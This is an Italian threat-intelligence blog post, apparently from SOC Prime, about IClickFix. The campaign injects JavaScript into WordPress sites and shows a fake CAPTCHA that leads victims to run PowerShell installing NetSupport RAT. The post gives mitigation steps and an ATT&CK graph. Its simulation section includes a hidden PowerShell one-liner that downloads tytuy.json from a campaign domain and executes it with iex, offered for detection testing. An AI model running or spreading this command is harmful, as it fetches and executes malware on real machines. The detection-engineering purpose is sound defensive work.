SOC Prime Bias: Medio

03 Feb 2026 21:25
newspaper icon Blog di Sekoia.io

Presentazione di IClickFix: un diffuso framework di attacco indirizzato a WordPress utilizzando la tattica ClickFix

Author Photo
Ruslan Mikhalov Capo della Ricerca sulle Minacce presso SOC Prime linkedin icon Segui
Presentazione di IClickFix: un diffuso framework di attacco indirizzato a WordPress utilizzando la tattica ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Sommario

Il rapporto profila IClickFix, un framework JavaScript dannoso che compromette i siti WordPress e presenta un CAPTCHA contraffatto in stile Cloudflare Turnstile. L’esca costringe i visitatori ad eseguire un comando PowerShell che scarica e installa NetSupport RAT. La distribuzione è supportata da un sistema di distribuzione del traffico costruito attorno all’abbreviazione di URL YOURLS e da un insieme rotante di domini di reindirizzamento. I ricercatori hanno osservato piĂą di 3.800 siti WordPress compromessi servire questa catena a livello globale dalla fine del 2024.

Indagine

Gli analisti di Sekoia hanno identificato il tag JavaScript iniettato ic-tracker-js nei siti compromessi, poi hanno ricostruito il flusso di reindirizzamento attraverso piĂą domini di breve durata. Hanno catturato il modello esatto di esecuzione PowerShell utilizzato per recuperare il payload finale e recuperato i componenti NetSupport RAT rilasciati insieme agli indicatori dell’infrastruttura C2 associata.

Mitigazione

Monitorare i contenuti web per l’ ic-tracker-js iniezione e bloccare i domini dannosi noti, i reindirizzatori e i servizi di link brevi utilizzati nella catena. Sugli endpoint, rilevare schemi di download ed esecuzione PowerShell coerenti con l’esca ClickFix. Aggiungere copertura per la creazione di file client NetSupport e per la persistenza tramite chiavi Run del registro di livello utente.

Risposta

Quando emergono indicatori, isolare l’endpoint, fermare il processo PowerShell attivo e rimuovere i binari NetSupport piĂą qualsiasi persistenza basata sul registro. Seguire con una triage forense completa per confermare che l’attaccante non abbia distribuito impianti aggiuntivi o stabilito percorsi di accesso secondari.

graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#cccccc %% Action Nodes action_initial_access[“<b>Azione</b> – <b>T1190 Sfruttamento di Applicazioni Esposte al Pubblico</b><br/>Compromissione di siti WordPress sfruttando vulnerabilitĂ  del core o di plugin popolari (Elementor, WooCommerce, Gravity Forms).”] class action_initial_access action action_content_injection[“<b>Azione</b> – <b>T1659 Iniezione di Contenuto</b><br/>Iniezione di JavaScript malevolo contenente il tag <i>icu2011trackeru2011js</i> nelle pagine compromesse per caricare script controllati dall’attaccante.”] class action_content_injection action action_software_extensions[“<b>Azione</b> – <b>T1176 Estensioni Software</b><br/>Sfruttamento di plugin WordPress vulnerabili come estensioni per mantenere il codice malevolo persistente sul sito.”] class action_software_extensions action action_dynamic_resolution[“<b>Azione</b> – <b>T1568 Risoluzione Dinamica</b><br/>Utilizzo dell’accorciatore YOURLS e di una catena di domini (ad esempio ksfldfklskdmbxcvb.com) per risolvere e distribuire i payload filtrando i bot.”] class action_dynamic_resolution action action_obfuscated_payloads[“<b>Azione</b> – <b>T1027 File Offuscati o Archiviati</b><br/>Codifica in Base64 del JavaScript di primo stadio e del loader PowerShell e suddivisione delle stringhe per eludere il rilevamento.”] class action_obfuscated_payloads action action_user_execution[“<b>Azione</b> – <b>T1204.001 Esecuzione dell’Utente: Link Malevolo</b><br/>Le vittime cliccano sull’URL WordPress compromesso, attivando la catena di reindirizzamento.”] class action_user_execution action action_input_injection[“<b>Azione</b> – <b>T1674 Iniezione di Input e T1204.004 Copia-Incolla Malevolo</b><br/>JavaScript scrive un comando PowerShell negli appunti e visualizza un falso CAPTCHA Cloudflare Turnstile come esca.”] class action_input_injection action action_powershell[“<b>Azione</b> – <b>T1059.001 PowerShell</b><br/>Un comando PowerShell nascosto viene eseguito, scarica lo script di secondo stadio <i>tytuy.json</i> e installa NetSupport RAT.”] class action_powershell action action_persistence[“<b>Azione</b> – <b>T1547.014 Esecuzione Automatica all’Avvio o al Logon: Active Setup</b><br/>Creazione di una chiave di registro Run che punta a <i>client32.exe</i> in ProgramData\\S1kCMNfZi3, garantendo l’esecuzione all’avvio.”] class action_persistence action action_c2[“<b>Azione</b> – <b>T1102.002 Servizio Web: Comunicazione Bidirezionale</b><br/>NetSupport RAT comunica tramite HTTPS con domini controllati dall’attaccante (ad esempio nightlomsknies.com/fakeurl.htm).”] class action_c2 action action_data_obfuscation[“<b>Azione</b> – <b>T1001 Offuscamento dei Dati</b><br/>Offuscamento del traffico di comando e controllo e dei payload per nascondere l’attivitĂ  malevola.”] class action_data_obfuscation action %% Tool / Malware / File Nodes tool_wordpress_core[“<b>Strumento</b> – <b>Nome</b>: WordPress Core<br/><b>VulnerabilitĂ </b>: Esecuzione di codice remoto”] class tool_wordpress_core tool tool_elementor_plugin[“<b>Strumento</b> – <b>Nome</b>: Plugin Elementor<br/><b>VulnerabilitĂ </b>: Esecuzione di codice remoto specifica CVE”] class tool_elementor_plugin tool tool_yourls[“<b>Strumento</b> – <b>Nome</b>: Accorciatore YOURLS<br/><b>Scopo</b>: Reindirizzamento URL e risoluzione dinamica”] class tool_yourls tool malware_netsupport[“<b>Malware</b> – <b>Nome</b>: NetSupport RAT<br/><b>CapacitĂ </b>: Controllo remoto ed esfiltrazione dei dati”] class malware_netsupport malware file_client32[“<b>File</b> – <b>Nome</b>: client32.exe<br/><b>Percorso</b>: ProgramData\\S1kCMNfZi3”] class file_client32 file file_tyuy_json[“<b>File</b> – <b>Nome</b>: tytuy.json<br/><b>Scopo</b>: Script PowerShell di secondo stadio”] class file_tyuy_json file %% Connections action_initial_access –>|sfrutta| tool_wordpress_core tool_wordpress_core –>|fornisce accesso| action_content_injection action_content_injection –>|inietta script tramite| tool_elementor_plugin action_content_injection –>|porta a| action_software_extensions action_software_extensions –>|persiste tramite| tool_elementor_plugin action_software_extensions –>|abilita| action_dynamic_resolution action_dynamic_resolution –>|utilizza| tool_yourls action_dynamic_resolution –>|distribuisce| action_obfuscated_payloads action_obfuscated_payloads –>|genera| action_user_execution action_user_execution –>|attiva| action_input_injection action_input_injection –>|scrive comando negli appunti| action_powershell action_powershell –>|scarica| file_tyuy_json file_tyuy_json –>|installa| malware_netsupport malware_netsupport –>|installa| action_persistence action_persistence –>|crea| file_client32 file_client32 –>|eseguito all’avvio| action_c2 malware_netsupport –>|comunica con| action_c2 action_c2 –>|utilizza| action_data_obfuscation

Flusso di Attacco

Esecuzione simulazione

Prerequisito: Il Telemetry & Baseline Pre‑flight Check deve essere passato.

  • Narrativa e Comandi dell’Attacco:

    Un avversario che ha accesso iniziale all’endpoint desidera stabilire una presenza persistente consegnando il NetSupport RAT. Per evitare il rilevamento interattivo, lanciano PowerShell in modalitĂ  nascosta senza profilo o logo (-w hidden -nop -c). Usano quindi Invoke‑WebRequest (iwr) per scaricare un payload JSON malevolo (tytuy.json) che contiene uno script PowerShell per il RAT. Lo script viene scritto nella directory temporanea ed eseguito tramite Invoke‑Expression. Questa riga di comando esatta corrisponde alle stringhe che la regola Sigma monitora.

  • Script di Test di Regressione:

    # Unica riga PowerShell che corrisponde alla regola di rilevamento
$url = 'https://scottvmorton.com/tytuy.json'
$out = "$env:TEMPpayload.ps1"

powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)"

  • Comandi di Pulizia:

    # Rimuovere il payload scaricato ed eventuali processi PowerShell residui
Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue
Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force

Unisciti alla piattaforma Detection as Code di SOC Prime per migliorare la visibilitĂ  sulle minacce piĂą rilevanti per il tuo business. Per aiutarti a iniziare e aumentare immediatamente il valore, prenota ora un incontro con gli esperti di SOC Prime.

Iscriviti gratis